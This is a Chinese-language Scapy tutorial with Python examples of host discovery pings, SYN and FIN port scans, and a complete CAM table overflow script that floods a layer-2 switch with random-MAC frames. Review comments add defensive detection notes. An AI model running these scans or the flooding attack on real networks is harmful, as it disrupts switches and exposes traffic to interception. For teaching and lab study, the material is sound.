一、环境搭建
- 安装:pip install scapy
- 官方文档:https://scapy.readthedocs.io/en/latest/index.html
二、应用举例
ping
#!/usr/bin/env python
#*-* coding:utf-8 -*-
from scapy.all import *
# TCP SYN ping: one SYN to port 80 of every address in 192.168.2.101-103.
# The summary prints the source address of each reply that sr() matched.
# NOTE(review): no timeout is passed to sr(), so the call may keep waiting
# on hosts that never answer until it is interrupted. Confirm this is intended.
syn_probe = IP(dst="192.168.2.101-103") / TCP(dport=80, flags="S")
ans, unans = sr(syn_probe)
ans.summary(lambda sent, reply: reply.sprintf("%IP.src% is alive"))
# TCP ACK ping: a bare ACK to port 80 of every address in 192.168.2.101-105.
# The {IP: ...} wrapper prints the text only for replies that carry an IP layer.
# An ACK that belongs to no tracked connection is what a stateful filter drops,
# so hosts behind one will typically end up in `unans`.
ack_probe = IP(dst='192.168.2.101-105') / TCP(dport=80, flags='A')
ans, unans = sr(ack_probe)
ans.summary(lambda sent, reply: reply.sprintf('{IP: %IP.src% is alive}'))
# ARP ping: broadcast a who-has request for every address in 192.168.56.0/24.
# srp() works at layer 2, so only hosts on the local segment can answer.
# timeout=2 bounds the wait after the last request has been sent.
# The summary prints the MAC address and IP address of each responder.
arp_probe = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst="192.168.56.0/24")
ans, unans = srp(arp_probe, timeout=2)
ans.summary(lambda sent, reply: reply.sprintf("%Ether.src% %ARP.psrc%"))
# ICMP ping: a default ICMP() (echo-request) to 192.168.56.99-110.
# The summary prints the source address of each reply that has an IP layer.
# NOTE(review): no timeout is passed to sr(), so hosts that filter ICMP may
# leave the call waiting until it is interrupted.
icmp_probe = IP(dst="192.168.56.99-110") / ICMP()
ans, unans = sr(icmp_probe)
ans.summary(lambda sent, reply: reply.sprintf("{IP: %IP.src% is alive}"))
scan
#!/usr/bin/env python
#*-* coding:utf-8 -*-
from scapy.all import *
# SYN scan of 192.168.56.90: the (20, 24) tuple makes Scapy send one SYN per
# port in the range 20-24. For each reply the summary prints the responding
# port and its TCP flags (SA = SYN/ACK, RA = RST/ACK).
# Detection side: a run of SYNs from one source to consecutive ports, none of
# which completes a handshake, is the pattern port-scan detection keys on.
syn_scan = IP(dst="192.168.56.90") / TCP(dport=(20, 24), flags="S")
ans, unans = sr(syn_scan)
ans.summary(lambda sent, reply: reply.sprintf("%TCP.sport% \t %TCP.flags%"))
# FIN scan: a single FIN segment to port 4444 on 192.168.56.102.
# `resp` receives the first reply; nothing in this listing inspects it.
# NOTE(review): sr1() is called without a timeout, so a port that stays silent
# may leave this call waiting until it is interrupted.
# Detection side: a FIN that belongs to no established connection is anomalous
# and is dropped by stateful filtering.
fin_packet = IP(dst='192.168.56.102') / TCP(dport=4444, flags='F')
resp = sr1(fin_packet)
attack
#-------------------------------------------------------------------------------#
# A script to perform CAM overflow attack on Layer 2 switches #
# Bharath(github.com/yamakira) #
# #
# CAM Table Overflow is flooding a switch's CAM table #
# with a lot of fake entries to drive the switch into HUB mode. #
# (Send thousands of Ether packets with random MAC addresses in each packet) #
#-------------------------------------------------------------------------------#
#!/usr/bin/env python
from scapy.all import Ether, IP, TCP, RandIP, RandMAC, sendp
def generate_packets():
    """Build the list of random Ethernet/IP frames before anything is sent.

    Each frame has a random source and destination MAC (RandMAC) and a random
    source and destination IP (RandIP). The list is prepared up front so that
    the send step is not slowed down by packet construction.

    NOTE(review): xrange(1, 10000) produces 9,999 frames, not the ten thousand
    the original header comment states. xrange exists only in Python 2.

    Defensive note: a per-port limit on learned MAC addresses (port security)
    caps how many of these source addresses a switch will accept. A burst of
    never-repeating source MACs on one access port is the signal to alert on.

    Returns:
        list: the generated Scapy packets.
    """
    return [
        Ether(src=RandMAC(), dst=RandMAC()) / IP(src=RandIP(), dst=RandIP())
        for _ in xrange(1, 10000)
    ]
def cam_overflow(packet_list):
    """Send every frame in *packet_list* at layer 2 through one interface.

    Args:
        packet_list: Scapy packets to transmit, passed to sendp() as given.
    """
    # The interface name is hard-coded.
    # NOTE(review): 'tap0' is presumably a virtual TAP device of a lab or
    # emulated network. Confirm before running on any other host.
    out_iface = 'tap0'
    sendp(packet_list, iface=out_iface)
if __name__ == '__main__':
    # Build the whole frame list first, then hand it to the sender in one call.
    cam_overflow(generate_packets())